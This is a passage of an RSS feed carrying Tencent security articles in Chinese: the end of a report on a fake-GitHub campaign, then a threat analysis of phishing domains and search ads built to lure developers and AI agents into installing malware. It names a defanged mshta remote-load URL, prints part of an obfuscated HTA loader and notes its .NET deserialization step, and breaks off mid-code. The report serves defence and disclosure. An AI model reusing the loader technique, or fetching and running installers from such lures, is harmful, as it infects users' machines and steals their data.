255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">adeelakhit</span></code><span leaf="">, </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">sanjusathian</span></code><span leaf="">, </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">arashfr933</span></code></p></td><td data-colwidth="219" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">FakeGit 矩阵攻击者用于批量发布伪造开源仓库的虚假账号</span></p></td></tr></tbody></table></p><h2 data-line="446" style="display: block;width: fit-content;padding: 0.3em 1.2em;margin: 2.5em auto 1.5em;color: rgb(255, 255, 255);background: rgb(0, 82, 217);font-size: calc(19.2px);font-weight: bold;text-align: center;border-radius: 6px;box-shadow: none;"><span leaf="">五、 结语：自动化时代的零信任救赎</span></h2><p data-line="448" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">攻击技术的演进，往往是一部生产工具被滥用的黑暗史。</span></p><p data-line="450" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">2026 年，这一判断有了更具体的形态。当用户向“小龙虾”说出“帮我找个工具装上”的那一刻，他们授出的不只是一次操作权限，而是整条信任链上最关键的一环——判断力。工信部对此类高权限 AI 工具发出安全警告，多家境外科技巨头相继封禁其对自家服务的调用，理由是“权限过高、边界模糊”。而 FakeGit，不过是将这种边界模糊推向了它的逻辑终点。</span></p><p data-line="452" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">在“万物皆可自动化生成”的纪元，防线已不再仅仅是企业边缘的防火墙，而是开发者敲下回车键前的那一秒迟疑。</span></p><p data-line="454" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">或者，在你对 AI 助手说出“帮我装上”之前，多问一句：</span><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">它从哪里找来的？</span></strong></p><p data-line="456" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">那只红色小龙虾还在各地的技术社区里被人争相“饲养”。它确实长出了手脚，确实能替你干活。但在 FakeGit 矩阵精心布置的猎场里，它的每一次自主搜索，都可能是一次没有安全网的高空走钢丝。</span></p><p data-line="458" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">针对OpenClaw安全风险，腾讯推出多场景安全防护矩阵：</span></strong></p><p data-line="460" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">本地个人：</span></strong></p><blockquote style="font-style: italic;padding: 1em 1em 1em 2em;border-left: 4px solid rgb(0, 82, 217);border-radius: 0px 6px 6px 0px;color: rgba(0, 0, 0, 0.6);background: rgb(247, 247, 247);margin-bottom: 1em;box-shadow: none;"><p data-line="461" style="display: block;font-size: 1em;letter-spacing: 0.1em;color: rgb(51, 51, 51);margin: 0px;"><span leaf=""><span textstyle="" style="font-style: normal;">腾讯电脑管家18.0版本为C端用户提供「龙虾管家-AI安全沙箱」，可实现“隔离运行、全程防护、行为可溯”，将“龙虾”放到“安全隔离房”里。</span></span></p></blockquote><p data-line="463" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">本地企业：</span></strong></p><blockquote style="font-style: italic;padding: 1em 1em 1em 2em;border-left: 4px solid rgb(0, 82, 217);border-radius: 0px 6px 6px 0px;color: rgba(0, 0, 0, 0.6);background: rgb(247, 247, 247);margin-bottom: 1em;box-shadow: none;"><p data-line="464" style="display: block;font-size: 1em;letter-spacing: 0.1em;color: rgb(51, 51, 51);margin: 0px;"><span leaf=""><span textstyle="" style="font-style: normal;">腾讯iOA为B端企业推出办公网安全方案，管控安装非法插件（Skills）、阻断非法访问、拦截数据窃取、限制违规外发，为企业构建全生命周期的安全防御。</span></span></p></blockquote><p data-line="466" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">云端部署</span></strong><span leaf="">：</span></p><blockquote style="font-style: italic;padding: 1em 1em 1em 2em;border-left: 4px solid rgb(0, 82, 217);border-radius: 0px 6px 6px 0px;color: rgba(0, 0, 0, 0.6);background: rgb(247, 247, 247);margin-bottom: 1em;box-shadow: none;"><p data-line="467" style="display: block;font-size: 1em;letter-spacing: 0.1em;color: rgb(51, 51, 51);margin: 0px;"><span leaf=""><span textstyle="" style="font-style: normal;">Lighthouse 与腾讯云 ClawPro 自带云端物理防爆箱：环境隔离、最小化端口放行、一键快照回滚</span></span></p><p data-line="467" style="display: block;font-size: 1em;letter-spacing: 0.1em;color: rgb(51, 51, 51);margin: 0px;"><span leaf=""><span textstyle="" style="font-style: normal;">AI Agent安全中心对 AI Agent 部署情况、Agent 行为、异常指令以及 skills 风险进行全面管理与防护 </span></span></p><p data-line="467" style="display: block;font-size: 1em;letter-spacing: 0.1em;color: rgb(51, 51, 51);margin: 0px;"><span leaf=""><span textstyle="" style="font-style: normal;">Agent Runtime 提供 VM 级强隔离、网络隔离、文件隔离、零凭证访问等能力，支持数十万实例并发</span></span></p></blockquote><p data-line="471" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">Skills安全</span></strong><span leaf="">：</span></p><blockquote style="font-style: italic;padding: 1em 1em 1em 2em;border-left: 4px solid rgb(0, 82, 217);border-radius: 0px 6px 6px 0px;color: rgba(0, 0, 0, 0.6);background: rgb(247, 247, 247);margin-bottom: 1em;box-shadow: none;"><p data-line="472" style="display: block;font-size: 1em;letter-spacing: 0.1em;color: rgb(51, 51, 51);margin: 0px;"><span leaf=""><span textstyle="" style="font-style: normal;">EdgeOne ClawScan 一句话即可让龙虾自己安装，自动 “体检” 并输出报告</span></span></p><p data-line="472" style="display: block;font-size: 1em;letter-spacing: 0.1em;color: rgb(51, 51, 51);margin: 0px;"><span leaf=""><span textstyle="" style="font-style: normal;">HaS Anonymizer 隐私保护，支持文本 / 图片信息扫描、脱敏和还原</span></span></p><p data-line="472" style="display: block;font-size: 1em;letter-spacing: 0.1em;color: rgb(51, 51, 51);margin: 0px;"><span leaf=""><span textstyle="" style="font-style: normal;">威胁情报中心 Skills安全检测，构建覆盖互联网威胁发现与未知样本检测的全方面防护能力</span></span></p></blockquote><figure data-line="476" style="margin: 1.5em 8px;color: rgb(51, 51, 51);"><span leaf=""><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100027789" data-ratio="1.8055555555555556" style="display: block;max-width: 100%;margin: 0.5em auto 1em;border-radius: 4px;box-shadow: rgba(0, 0, 0, 0.12) 0px 2px 12px;" data-type="jpeg" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=1e8905f4&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FjHUbrwW0VwWU8jr9QjReJsMudFUDfjOUibiaQYYPXmWpf4ibjMicxq66ia3GyRboOia1UeNtBAW0p7MJr8I3j07F3QqaKEv1yiauMHbvWB4bh8b0Zo%2F640%3Fwx_fmt%3Djpeg%26from%3Dappmsg"/></span></figure><p data-line="479" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">腾讯将持续跟进AI时代面临的新型威胁态势，为拥抱AI的每位用户保驾护航。</span></p><h2 data-line="481" style="display: block;width: fit-content;padding: 0.3em 1.2em;margin: 2.5em auto 1.5em;color: rgb(255, 255, 255);background: rgb(0, 82, 217);font-size: calc(19.2px);font-weight: bold;text-align: center;border-radius: 6px;box-shadow: none;"><span leaf="">附录：参考链接</span></h2><p style="font-family: -apple-system-font,BlinkMacSystemFont, Helvetica Neue, PingFang SC, Hiragino Sans GB , Microsoft YaHei UI , Microsoft YaHei ,Arial,sans-serif;font-size: 16px;line-height: 1.75;text-align: left;"><ul style="list-style: circle;padding-left: 1em;margin-left: 0;color: #3f3f3f;margin-top: 0 !important;" class="list-paddingleft-1"></ul><ul style="list-style: circle;padding-left: 1em;margin-left: 0;color: #3f3f3f;margin-top: 0 !important;" class="list-paddingleft-1"></ul><ul style="list-style-type: disc;" class="list-paddingleft-1"><li><p style="font-family: -apple-system-font,BlinkMacSystemFont, Helvetica Neue, PingFang SC, Hiragino Sans GB , Microsoft YaHei UI , Microsoft YaHei ,Arial,sans-serif;font-size: 16px;line-height: 1.75;text-align: left;"><span leaf=""><a href="https://www.derp.ca/research/fakegit-luajit-github-campaign/" target="_blank">https://www.derp.ca/research/fakegit-luajit-github-campaign/</a><a class="wx_topic_link" topic-id="mn2w4zd8-xomdgg" style="color: #576B95 !important;" data-topic="1">#ioc</a>-summary</span></p></li></ul></p></div><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=8fed351c&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzI5ODk3OTM1Ng%3D%3D%26mid%3D2247511445%26idx%3D1%26sn%3D2f06e9a91eb303a5cf0f24dd103141a9">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Mon, 23 Mar 2026 18:22:00 +0800</pubDate>
    </item>
    <item>
      <title>人机双杀 | 别被 “龙虾” 骗了！伪装 AI 工具的钓鱼，让智能体沦为“内鬼”</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzI5ODk3OTM1Ng==&amp;mid=2247511428&amp;idx=1&amp;sn=679549b2025149f11863d46357626017</link>
      <description>腾讯安全捕获新型 “AI 认知” 钓鱼攻击：黑客利用 AI 偏好伪造高可信域名，使其 “灯下黑” 下载窃密后门，传统防御需升级 “认知防御” 体系。</description>
      <content:encoded><![CDATA[<p><span>腾讯安全威胁情报中心</span> <span>2026-03-17 17:17</span> <span style="display: inline-block;">上海</span></p>






  
  <p><img src="https://wechat2rss.xlab.app/img-proxy/?k=8f466806&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FjHUbrwW0VwVjZSMNt1L0mHoP3ZLRCFsYphq7EM4YDbQTic8CNoeogf8Qlw5ibHwosC6SrMXLhblg1FZsDHSLdLDDnV1HEibaAwfVPcGr3nCxtQ%2F0%3Fwx_fmt%3Djpeg"/></p>
  <p>腾讯安全捕获新型 “AI 认知” 钓鱼攻击：黑客利用 AI 偏好伪造高可信域名，使其 “灯下黑” 下载窃密后门，传统防御需升级 “认知防御” 体系。</p>
  <div class="wx-theme" style="color: rgb(51, 51, 51);font-family: -apple-system, BlinkMacSystemFont, &#34;Segoe UI&#34;, Roboto, &#34;Helvetica Neue&#34;, Arial, &#34;Noto Sans&#34;, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;, &#34;Segoe UI Symbol&#34;, &#34;Noto Color Emoji&#34;;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;overflow-wrap: break-word;font-size: 16px;line-height: 1.6;padding: 20px 16px;"><h2 data-line="0" style="display: block;width: fit-content;padding: 0.3em 1.2em;margin: 16px auto 1.5em;color: rgb(255, 255, 255);background: rgb(0, 82, 217);font-size: calc(19.2px);font-weight: bold;text-align: center;border-radius: 6px;box-shadow: none;"><span leaf="">前言</span></h2><p data-line="2" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">2026年开春，随着 OpenClaw（龙虾）、Claude Code 等 AI 智能体工具在国内技术圈彻底爆火，大模型已经从单纯的聊天助手进化成了能帮我们敲代码、管服务器的数字员工。然而，当开发者们兴奋地把底层执行权限交给 AI 时，一种全新的安全隐患也随之悄然降临。</span></p><p data-line="4" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">腾讯安全威胁情报团队本月捕获的最新案例，揭示了攻击套路发生了一个极具前瞻性的变化：它骗的不仅是人，还有帮我们干活的 AI。 攻击者非常了解大模型是怎么思考的，他们在注册钓鱼域名时，特意堆砌了 install-files、official-version 等看起来特别正规的词汇。这是一招极其狡猾的量身定制：当开发者习惯性地对 AI 下达“帮我一键安装某某工具”的指令时，AI 智能体基于其底层的语义偏好，结合搜索引擎的结果排名，会本能地认为这些带有官方特征词的网站是合法来源，进而毫无戒备地自动拉取并执行恶意代码。</span></p><p data-line="6" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">在这套自动化的工作流中，AI 虽然懂代码，却缺乏经验丰富程序员独有的防备心和视觉辨识力。它直接越过了传统的安全边界，在无意中成了恶意软件的“完美引路人”。这意味着，当我们把繁杂的运维工作交给 AI 时，反而因为拉长了信任链条，让防线从内部被轻易瓦解。面对这种利用 AI 认知盲区的新型威胁，我们的防御思路必须随之升级。</span></p><figure data-line="9" style="margin: 1.5em 8px;color: rgb(51, 51, 51);"><span leaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.5583333333333333" data-type="png" data-w="1080" style="display: block;max-width: 100%;margin: 0.5em auto 1em;border-radius: 4px;box-shadow: rgba(0, 0, 0, 0.12) 0px 2px 12px;" data-imgfileid="100027772" src="https://wechat2rss.xlab.app/img-proxy/?k=3875bd57&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FjHUbrwW0VwUnqgRnBrQn6UCUwC2qWFJd3JibughymA0qMrUEjgBibh9uUSnt23Cx4mA2DnSc6EnHgH3Q6w98FjNItq52mkMRWOYJ6msAicKjibI%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></figure><h2 data-line="13" style="display: block;width: fit-content;padding: 0.3em 1.2em;margin: 2.5em auto 1.5em;color: rgb(255, 255, 255);background: rgb(0, 82, 217);font-size: calc(19.2px);font-weight: bold;text-align: center;border-radius: 6px;box-shadow: none;"><span leaf="">攻击链技术分析</span></h2><h3 data-line="15" style="padding-left: 12px;border-left: 4px solid rgb(0, 82, 217);border-bottom: 1px dashed rgb(0, 82, 217);margin: 2em 8px 0.75em 0px;color: rgb(51, 51, 51);font-size: calc(19.2px);font-weight: bold;line-height: 1.2;"><span leaf="">阶段一：利用大模型分词机制，为“投毒”铺路</span></h3><p data-line="17" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">为了在未来的攻击中混淆大语言模型的检索与判断机制，攻击者预先进行了一项精心的数据投毒准备。其核心思路是利用大模型的文本分词与知识关联特性，批量注册一系列“高权威性”域名。</span></p><p data-line="19" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">攻击者选择的域名示例如下：</span></p><ul style="list-style-type: disc;padding-left: 1.5em;margin-left: 0px;color: rgb(51, 51, 51);" class="list-paddingleft-1"><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 0px;padding: 0px;"><span leaf="">*.install-files.com</span></p></li><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 0px;padding: 0px;"><span leaf="">*.update-version.com</span></p></li><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 0px;padding: 0px;"><span leaf="">*.last-version.com</span></p></li><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 0px;padding: 0px;"><span leaf="">*.official-version.com</span></p></li><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 0px;padding: 0px;"><span leaf="">*.active-version.com</span></p></li></ul><p data-line="26" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">“install”、“version”、“official”等组合词在软件开发、更新场景中具有高度正相关性和权威性。当大模型在训练或检索时摄入这些域名信息，会倾向于将其与“安全”、“官方”等概念建立关联。此举旨在干扰模型的上下文，为后续利用这些域名或其子域名进行钓鱼攻击时，降低模型对威胁的识别概率。</span></p><p data-line="28" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">这些域名的注册时间高度集中在2026年2月底至3月初，并与当时的热点AI项目同步，设计对应的子域名结构，其目的是提前布局，以便后续在SEO和竞价排名中占据有利位置。<img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.6685185185185185" data-type="png" data-w="1080" style="display: block;max-width: 100%;margin: 0.5em auto 1em;border-radius: 4px;box-shadow: rgba(0, 0, 0, 0.12) 0px 2px 12px;" data-imgfileid="100027770" src="https://wechat2rss.xlab.app/img-proxy/?k=a2cd0ac5&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FjHUbrwW0VwVrLrDHeMiaVlx7foGibjCxohUcl1zsHicQANBQqByOLNtPrQYkqMjDKx7eQgNE0KkZmjaWeTicibVV3gXXj6wrL3tsCB2NiazT5HcpE%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><h3 data-line="31" style="padding-left: 12px;border-left: 4px solid rgb(0, 82, 217);border-bottom: 1px dashed rgb(0, 82, 217);margin: 2em 8px 0.75em 0px;color: rgb(51, 51, 51);font-size: calc(19.2px);font-weight: bold;line-height: 1.2;"><span leaf="">阶段二：竞价排名引导，实现精准钓鱼</span></h3><p data-line="33" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">在完成基础设施准备后，攻击者利用搜索引擎的竞价广告机制，购买与热门AI工具（如“OpenClaw”、“Claude Code”等）相关的关键词排名。当用户搜索这些工具时，搜索结果前列会显示攻击者购买的广告，将受害者精准引导至其精心构建的钓鱼网站。<img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.6324074074074074" data-type="png" data-w="1080" style="display: block;max-width: 100%;margin: 0.5em auto 1em;border-radius: 4px;box-shadow: rgba(0, 0, 0, 0.12) 0px 2px 12px;" data-imgfileid="100027769" src="https://wechat2rss.xlab.app/img-proxy/?k=12db299a&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FjHUbrwW0VwU3Gyic8OoIjuHQkpiaOrGymxMqFExmvWOiaebutVFWOtfia1TfAngKUz7xwgJ07cics8hSlSIDib9Konyowc0fIaXEZ2yGv9orvxG7c%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><p data-line="36" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">这些钓鱼网站通常使用Squarespace等简易建站工具快速搭建，外观高度模仿目标AI工具的官方网站或客户端下载页。其核心攻击载荷是针对不同操作系统（如macOS、Windows）的恶意软件下载命令。网站页面中会直接植入这些命令，诱导急于尝试新工具的用户复制并在终端中执行，从而完成恶意软件的下载与安装。<img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.6861111111111111" data-type="png" data-w="1080" style="display: block;max-width: 100%;margin: 0.5em auto 1em;border-radius: 4px;box-shadow: rgba(0, 0, 0, 0.12) 0px 2px 12px;" data-imgfileid="100027771" src="https://wechat2rss.xlab.app/img-proxy/?k=4d27196e&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FjHUbrwW0VwXIZUfTSMLQjcFgDacbJNFuuQTrdVQeGn4DmK5vQFAeZcQ88aRicfXBvh8ILoogH9k45NGbFAicTsLQ5s3DLEgM6J0ShYs4Cm9Ow%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><p data-line="39" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">通过对恶意载荷托管地址的关联分析发现，攻击者并非只针对单一工具。他们为OpenClaw、Claude Code等多个热门AI工具均分配了不同的子域名来托管对应的恶意载荷，形成了一条规模化、批量化的“AI工具主题”钓鱼攻击链。<img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.43425925925925923" data-type="png" data-w="1080" style="display: block;max-width: 100%;margin: 0.5em auto 1em;border-radius: 4px;box-shadow: rgba(0, 0, 0, 0.12) 0px 2px 12px;" data-imgfileid="100027768" src="https://wechat2rss.xlab.app/img-proxy/?k=47de1038&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FjHUbrwW0VwVkbYHzSyqDBicx8HuFKH81ib0fo4xfiaqicc4NhonwBjKojgickgoMYQK6KeCibjUy7ZYeQOYmylPT2AqDTuD039l1t9hL5qiaOrqLwk%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><h2 data-line="43" style="display: block;width: fit-content;padding: 0.3em 1.2em;margin: 2.5em auto 1.5em;color: rgb(255, 255, 255);background: rgb(0, 82, 217);font-size: calc(19.2px);font-weight: bold;text-align: center;border-radius: 6px;box-shadow: none;"><span leaf="">恶意载荷拆解分析</span></h2><p data-line="45" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">如下图，当用户通过上述钓鱼入口执行攻击者恶意指令，主机将通过mshta加载攻击者远程（hxxps[:]//claude-code.official-version[.]com/claude）恶意代码，腾讯终端安全产品IOA成功捕获并告警相关事件。</span></p><figure data-line="47" style="margin: 1.5em 8px;color: rgb(51, 51, 51);"><span leaf=""><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100027776" data-ratio="0.8203703703703704" style="display: block;max-width: 100%;margin: 0.5em auto 1em;border-radius: 4px;box-shadow: rgba(0, 0, 0, 0.12) 0px 2px 12px;" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=c7b58f5d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FjHUbrwW0VwXtOar9KyibApkNfeDcCQxOuCwn6htvSOpfxum0B3emu9rWxMMaynIeI4zeHHyGY8u1Hz8nXiakhwxC5m7og5IWoAhhNbIbnvtOE%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></figure><p data-line="51" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">分析Claude恶意载荷，文件头信息伪装为压缩包格式，但尝试对其解压会提示文件损坏，无法成功获取其中文件。</span></p><figure data-line="53" style="margin: 1.5em 8px;color: rgb(51, 51, 51);"><span leaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.33611111111111114" data-type="png" data-w="1080" style="display: block;max-width: 100%;margin: 0.5em auto 1em;border-radius: 4px;box-shadow: rgba(0, 0, 0, 0.12) 0px 2px 12px;" data-imgfileid="100027774" src="https://wechat2rss.xlab.app/img-proxy/?k=8b57cd5b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FjHUbrwW0VwXwUNOK97Pas773ZKl2tiaCzebBBHI6HDMvZysibEsh7N5ZoOyWDWZtibldftDSqk2IhtuZ952L4anI47IwrjvKwxmUOpWChryI1w%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></figure><figure data-line="55" style="margin: 1.5em 8px;color: rgb(51, 51, 51);"><span leaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.47035573122529645" data-type="png" data-w="759" style="display: block;max-width: 100%;margin: 0.5em auto 1em;border-radius: 4px;box-shadow: rgba(0, 0, 0, 0.12) 0px 2px 12px;" data-imgfileid="100027773" src="https://wechat2rss.xlab.app/img-proxy/?k=7088a271&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FjHUbrwW0VwUcImJxiabk4QOdrRLIdgD8oiaEGLAic0KgZX8tqics4qrBeDf3JSxiaEibONxgX3ycuPTSmUqKVhttr4v01E9JEk1xIKtjgvp3r7n84%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></figure><p data-line="57" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">进一步分析该损坏的压缩包数据，发现在其压缩数据尾部隐藏了恶意的hta脚本代码。 使用已知类型文件尾部附加恶意代码是改团伙的惯用手法。分析过程中，我们还发现了该团伙使用正常的DLL,PDF等文件等填充到恶意代码头部以规避安全检测。 DLL文件伪装后门HASH：f2e4f83e998b320b43b4671192917a85 PDF文件伪装后门HASH：91f1b9637f551921cc6d7f966c43ef5a</span></p><p data-line="62" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">恶意hta脚本使用字符混淆，调用IndexInsider函数将16进制字符串转换为ASCII字符隐藏代码中出现的明文字符串，例如以下WScript.Shell字符的拼接过程。</span></p><p style="margin: 10px 8px;border-radius: 8px;border: 1px solid rgb(200, 208, 219);background: rgb(234, 238, 243);overflow: hidden;"><pre style="margin: 0px;border: none;border-radius: 0px;box-shadow: none;background: transparent;font-size: 14.4px;line-height: 1.5;overflow-x: auto;padding: 0px !important;"><code language="" style="display: block;padding: 0.5em 1em 1em;overflow-x: auto;text-indent: 0px;color: rgb(0, 25, 58);white-space: nowrap;word-break: normal;overflow-wrap: normal;margin: 0px;font-size: inherit;line-height: inherit;border: none;border-radius: 0px;background: transparent !important;"><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">MediumChurn = IndexInsider(</span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;5753&#34;</span></span><span leaf="">) &amp; IndexInsider(</span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;637269&#34;</span></span><span leaf="">)</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">MediumChurn = MediumChurn &amp; IndexInsider(</span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;70742e5368&#34;</span></span><span leaf="">) &amp; IndexInsider(</span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;656c6c&#34;</span></span><span leaf="">)</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">Set</span></span><span style="color: rgb(76, 129, 201);"><span leaf="">BottomMaturity</span></span><span style="color: rgb(76, 129, 201);"><span leaf="">=</span></span><span leaf=""> CreateObject(MediumChurn)</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;5753&#34;</span></span><span leaf=""> → WS</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;637269&#34;</span></span><span leaf=""> → cri</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;70742e5368&#34;</span></span><span leaf=""> → pt.Sh</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;656c6c&#34;</span></span><span leaf=""> → ell</span></p></code></pre></p><p data-line="77" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">最终利用 .NET 反序列化（Deserialize_2）加载两个 .NET BinaryFormatter 序列化数据对象（DefineFederal 和 SetAutomated）。</span></p><p style="margin: 10px 8px;border-radius: 8px;border: 1px solid rgb(200, 208, 219);background: rgb(234, 238, 243);overflow: hidden;"><pre style="margin: 0px;border: none;border-radius: 0px;box-shadow: none;background: transparent;font-size: 14.4px;line-height: 1.5;overflow-x: auto;padding: 0px !important;"><code language="" style="display: block;padding: 0.5em 1em 1em;overflow-x: auto;text-indent: 0px;color: rgb(0, 25, 58);white-space: nowrap;word-break: normal;overflow-wrap: normal;margin: 0px;font-size: inherit;line-height: inherit;border: none;border-radius: 0px;background: transparent !important;"><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">Sub </span><span style="color: rgb(0, 72, 171);"><span leaf="">StartLending</span></span><span leaf="">()</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">    On Error Resume Next</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">    Dim MediumChurn </span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">    Dim BottomMaturity, </span><span style="color: rgb(0, 72, 171);"><span leaf="">IndexLien</span></span></p><p style="margin: 